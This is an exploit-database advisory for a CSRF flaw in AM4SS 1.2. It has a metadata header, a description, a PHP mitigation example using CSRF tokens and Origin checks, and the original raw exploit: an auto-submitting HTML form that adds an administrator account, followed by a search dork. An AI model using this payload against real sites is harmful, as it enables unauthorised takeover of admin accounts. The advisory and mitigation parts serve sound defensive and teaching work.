Vendor: AM4SS
By: red virus
CVSS: 8.8 (HIGH)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)
Product Name: AM4SS
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: am4ss:am4ss:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2011

AM4SS Version 1.2 – CSRF add Admin

This exploit lets an attacker add an administrator account to AM4SS 1.2 by causing a logged-in admin's browser to submit a forged POST request to the admincp/users.php?do=add page. The request carries the new user's details (full name, password, email, country and usergroup), and the application accepts it without any check that the submission originated from its own form. The attacker can then log in with those credentials and gain administrative access to the application.

Mitigation:

Implementing a CSRF token in the application prevents this type of attack: the server issues an unpredictable per-session token, embeds it in every state-changing form, and rejects any POST whose token is missing or does not match the copy held in the session.
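The following is an added example of that mitigation, not AM4SS's own code: a synchronizer-token check in front of a hypothetical users.php add handler, written in PHP because AM4SS is a PHP application. The file name, the `csrf_token` field name, the allowed origin `https://example.test` and the session settings are assumptions chosen for the illustration; the form field names match the ones the exploit above submits.

```php
<?php
// Added example (not AM4SS code): synchronizer-token CSRF protection for a
// form handler such as admincp/users.php?do=add. All names here are assumed.
declare(strict_types=1);

// Mark the session cookie SameSite=Lax so browsers do not attach it to
// cross-site POSTs at all (PHP 7.3+); the token check below remains the
// primary defence and also covers browsers that ignore the attribute.
session_set_cookie_params([
    'samesite' => 'Lax',
    'secure'   => true,
    'httponly' => true,
]);
session_start();

// Issue (or reuse) a per-session token: 32 random bytes, hex-encoded.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session copy in constant time.
function csrf_valid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted)
        && $expected !== ''
        && hash_equals($expected, $submitted);
}

// Second check: when the browser sends an Origin header, it must be ours.
// $allowed is this site's own origin (assumed value in the caller below).
function origin_allowed(string $allowed): bool
{
    $origin = $_SERVER['HTTP_ORIGIN'] ?? null;
    if ($origin === null) {
        return true; // no Origin header: rely on the token check alone
    }
    return $origin === $allowed;
}

$action = $_GET['do'] ?? '';

if ($_SERVER['REQUEST_METHOD'] === 'POST' && $action === 'add') {
    if (!csrf_valid($_POST['csrf_token'] ?? null)
        || !origin_allowed('https://example.test')) {
        // The forged request in the exploit carries no token, so it stops here.
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }
    // ... existing user-creation logic using $_POST['userfullname'],
    //     $_POST['password'], $_POST['useremail'], $_POST['country'],
    //     $_POST['usergroup'] goes here ...
    exit('User added.');
}

// Rendering the admin form: embed the token as a hidden field, so only a
// page served by this site to this session can produce an accepted POST.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
?>
<form action="users.php?do=add" method="post">
  <input type="hidden" name="csrf_token" value="<?= $token ?>">
  <input name="userfullname" type="text">
  <input name="password" type="password">
  <input name="useremail" type="text">
  <input name="country" type="text">
  <input name="usergroup" type="text">
  <button type="submit" name="do" value="save">Save</button>
</form>
```

The token must be compared with hash_equals rather than ==, regenerated per session (or per form, if you want stricter replay limits), and never exposed in a URL or a response readable cross-origin. The Origin check is a cheap additional layer, not a replacement: it is only reliable when the header is present, which is why a missing header falls through to the token check instead of being accepted on its own.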

Exploit-DB raw data:

#Title    :  AM4SS Version 1.2  - CSRF add Admin
#Script   :  AM4SS Version 1.2
#Language : Php
#Download : http://am4ss.org/am4ss.tar.gz                 
#Date     : 2011/09/09
#Version  : 1.2
#Dork     : "Powered by AM4SS "
#Found    : by red virus >>> c3o@w.cn
#Homepage : www.alm3refh.com
 
 
 
<html>
<form name="r3dvirus" action="http://localhost/am4ss/admincp/users.php?do=add" method="post">
<input value="egypt" name="userfullname" type="text" />
<input value="123456" name="password" type="text" />
<input value="c3o@w.cn" name="useremail" type="text" />
<input value="EG" name="country" type="text" />
<input value="3" name="usergroup" type="text" />
<input value="save" name="do" type="text" />
</form>
<script>document.r3dvirus.submit();</script>
</html>

###########################################################################################################
greats 2
 >>> alm3refh.com - tryag.cc - joood
T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 & orange man
infofst & virus hima & Karar aLShaMi & b0x & all alm3refh group